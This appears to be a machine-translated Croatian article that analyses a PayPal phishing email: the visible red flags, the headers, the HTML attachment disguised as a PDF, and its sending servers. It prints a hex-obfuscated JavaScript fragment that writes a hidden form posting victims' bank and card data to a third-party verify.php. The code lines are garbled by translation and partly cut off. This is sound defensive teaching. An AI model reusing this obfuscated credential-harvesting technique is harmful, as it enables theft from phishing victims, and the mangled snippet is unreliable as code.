Sigurnost na mreži: razbijanje anatomije e-pošte za krađu identiteta


U današnjem svijetu u kojem su svačije informacije na mreži, phishing je jedan od najpopularnijih i najrazornijih online napada, jer uvijek možete očistiti virus, ali ako su vam bankovni podaci ukradeni, u nevolji ste. Evo pregleda jednog takvog napada koji smo primili.



Nemojte misliti da su važni samo vaši bankovni podaci: uostalom, ako netko dobije kontrolu nad prijavom na vaš račun, ne samo da zna podatke sadržane na tom računu, već je vjerojatno da se isti podaci za prijavu mogu koristiti na raznim drugim račune. A ako ugroze vaš račun e-pošte, mogu poništiti sve vaše ostale lozinke.

Dakle, osim što čuvate jake i različite lozinke, uvijek morate biti u potrazi za lažnim e-porukama koje se maskiraju kao prava stvar. Dok većina phishing pokušaji su amaterski, neki su prilično uvjerljivi pa je važno razumjeti kako ih prepoznati na površinskoj razini kao i kako funkcioniraju ispod haube.





POVEZANO: Zašto pišu phishing sa 'ph?' Nevjerojatan omaž

Autor slike asirap



Ispitivanje onoga što je na vidiku

Naš primjer e-pošte, kao i većina pokušaja krađe identiteta, obavještava vas o aktivnostima na vašem PayPal računu što bi, u normalnim okolnostima, bilo alarmantno. Dakle, poziv na akciju je da potvrdite/vratite svoj račun slanjem gotovo svih osobnih podataka kojih se možete sjetiti. Opet, ovo je prilično formulirano.

Iako zasigurno postoje iznimke, gotovo svaki e-mail za krađu identiteta i prijevaru ima crvene zastavice izravno u samoj poruci. Čak i ako je tekst uvjerljiv, obično možete pronaći mnoge pogreške razbacane po cijelom tijelu poruke koje ukazuju da poruka nije legitimna.

Tijelo poruke



Oglas

Na prvi pogled, ovo je jedan od boljih phishing emailova koje sam vidio. Nema pravopisnih ili gramatičkih grešaka, a glagolski izraz glasi prema onome što možete očekivati. Međutim, postoji nekoliko crvenih zastavica koje možete vidjeti kada malo pomnije proučite sadržaj.

  • Paypal – ispravna velika slova je PayPal (velika slova P). Možete vidjeti da se u poruci koriste obje varijacije. Tvrtke su vrlo promišljene sa svojim brendiranjem, pa je dvojbeno da bi tako nešto moglo proći provjeru.
  • dopusti ActiveX – Koliko ste puta vidjeli da legalna web-bazirana tvrtka veličine Paypala koristi vlasničku komponentu koja radi samo na jednom pregledniku, osobito kada podržava više preglednika? Naravno, negdje vani neka tvrtka to radi, ali ovo je crvena zastava.
  • sigurno. – Obratite pažnju kako se ova riječ ne slaže na margini s ostatkom teksta odlomka. Čak i ako još malo razvučem prozor, on se ne omota niti razmakne ispravno.
  • Paypal ! – Razmak ispred uskličnika izgleda nezgrapno. Samo još jedna zamisao za koju sam siguran da ne bi bila u zakonitom e-poruci.
  • PayPal – Formular za ažuriranje računa.pdf.htm – Zašto bi Paypal priložio PDF, pogotovo kada bi mogao samo povezati stranicu na svoju stranicu? Dodatno, zašto bi pokušali prikriti HTML datoteku kao PDF? Ovo je najveća crvena zastava od svih njih.

Zaglavlje poruke

Kada pogledate zaglavlje poruke, pojavljuje se još nekoliko crvenih zastavica:

  • Adresa pošiljatelja je test@test.com .
  • Nedostaje adresa. Nisam ovo ispraznio, jednostavno nije dio standardnog zaglavlja poruke. Tvrtka koja ima vaše ime obično će vam personalizirati e-poštu.

Privitak

Kad otvorim privitak, odmah možete vidjeti da izgled nije ispravan jer mu nedostaju informacije o stilu. Opet, zašto bi PayPal slao HTML obrazac e-poštom kada bi vam jednostavno mogao dati vezu na svojoj web stranici?

Bilješka: za to smo koristili Gmailov ugrađeni HTML preglednik privitaka, ali preporučujemo da NE OTVARATE privitke od prevaranta. Nikada. Ikad. Vrlo često sadrže exploite koji će instalirati trojance na vaše računalo kako bi vam ukrali podatke o računu.

Pomicanjem prema dolje možete vidjeti da ovaj obrazac ne traži samo podatke za prijavu na PayPal, već i podatke o bankovnim i kreditnim karticama. Neke od slika su pokvarene.

Očito je da se ovim pokušajem krađe identiteta sve ide na kraj jednim zamahom.

Tehnički kvar

Iako bi na temelju onoga što je vidljivo trebalo biti prilično jasno da se radi o pokušaju krađe identiteta, sada ćemo razložiti tehničku strukturu e-pošte i vidjeti što možemo pronaći.

Informacije iz Priloga

Oglas

Prva stvar koju treba pogledati je HTML izvor obrasca za privitak koji šalje podatke na lažnu stranicu.

Kada brzo pregledate izvor, sve veze izgledaju valjane jer upućuju na paypal.com ili paypalobjects.com koje su obje legitimne.

Sada ćemo pogledati neke osnovne informacije o stranici koje Firefox prikuplja na stranici.

Kao što možete vidjeti, neke od grafika su izvučene s domena blessedtobe.com, goodhealthpharmacy.com i pic-upload.de umjesto legitimnih PayPal domena.

Informacije iz zaglavlja e-pošte

Zatim ćemo pogledati zaglavlja neobrađenih poruka e-pošte. Gmail to čini dostupnim putem opcije izbornika Prikaži original na poruci.

Oglas

Gledajući informacije u zaglavlju izvorne poruke, možete vidjeti da je ova poruka sastavljena pomoću Outlook Expressa 6. Sumnjam da PayPal ima nekoga u osoblju koji svaku od ovih poruka šalje ručno putem zastarjelog klijenta e-pošte.

Sada gledajući informacije o usmjeravanju, možemo vidjeti IP adresu i pošiljatelja i poslužitelja e-pošte koji prenosi.

IP adresa korisnika je izvorni pošiljatelj. Brzo traženje IP informacija, možemo vidjeti da je IP za slanje u Njemačkoj.

A kada pogledamo IP adresu poslužitelja e-pošte (mail.itak.at), možemo vidjeti da se radi o ISP-u sa sjedištem u Austriji. Sumnjam da PayPal usmjerava njihove e-poruke izravno preko austrijskog ISP-a kada imaju veliku farmu poslužitelja koja bi se lako mogla nositi s ovim zadatkom.

Gdje idu podaci?

Dakle, jasno smo utvrdili da se radi o phishing e-pošti i prikupili neke informacije o tome odakle poruka potječe, ali što je s tim gdje se šalju vaši podaci?

Da bismo to vidjeli, prvo moramo spremiti HTM privitak na radnu površinu i otvoriti ga u uređivaču teksta. Skrolajući kroz njega, čini se da je sve u redu osim kada dođemo do Javascript bloka sumnjivog izgleda.

Oglas

Razbijajući puni izvor posljednjeg bloka Javascripta, vidimo:


// Autorsko pravo © 2005 Voormedia – WWW.VOORMEDIA.COM
var i, y, x = 3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e, y = jer (i = 0; i

Kad god vidite veliki zbrkani niz naizgled nasumičnih slova i brojeva ugrađen u Javascript blok, obično je to nešto sumnjivo. Gledajući kod, varijabla x je postavljena na ovaj veliki niz, a zatim se dekodira u varijablu y. Konačni rezultat varijable y tada se upisuje u dokument kao HTML.

Budući da se veliki niz sastoji od brojeva 0-9 i slova a-f, najvjerojatnije je kodiran jednostavnim ASCII u hex pretvorbu:

3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e6532672f670e3d22687474703

Prevodi na:

Nije slučajno da se ovo dekodira u valjanu oznaku HTML obrasca koja rezultate šalje ne PayPal-u, već lažnoj stranici.

Osim toga, kada pogledate HTML izvor obrasca, vidjet ćete da ova oznaka obrasca nije vidljiva jer se generira dinamički putem Javascripta. Ovo je pametan način da se sakrijete što HTML zapravo radi ako bi netko jednostavno pregledao generirani izvor privitka (kao što smo to učinili ranije) za razliku od otvaranja privitka izravno u uređivaču teksta.

Pokretanjem brzog whois-a na web-mjestu uvredljivom možemo vidjeti da je ovo domena koja se nalazi na popularnom web hostu, 1and1.

Oglas

Ono što se ističe je da domena koristi čitljiv naziv (za razliku od nečeg poput dfh3sjhskjhw.net) i da je domena registrirana 4 godine. Zbog toga vjerujem da je ova domena oteta i korištena kao pijun u ovom pokušaju krađe identiteta.

Cinizam je dobra obrana

Kada je u pitanju sigurnost na internetu, nikad ne škodi malo cinizma.

Iako sam siguran da u primjeru e-pošte ima više crvenih zastavica, ono što smo istaknuli iznad su pokazatelji koje smo vidjeli nakon samo nekoliko minuta pregleda. Hipotetički, da je površinska razina e-pošte 100% oponašala njegov legitimni pandan, tehnička analiza bi ipak otkrila njegovu pravu prirodu. Zbog toga je važno moći ispitati i ono što možete i ne možete vidjeti.

PROČITAJTE SLJEDEĆE

Zanimljivi Članci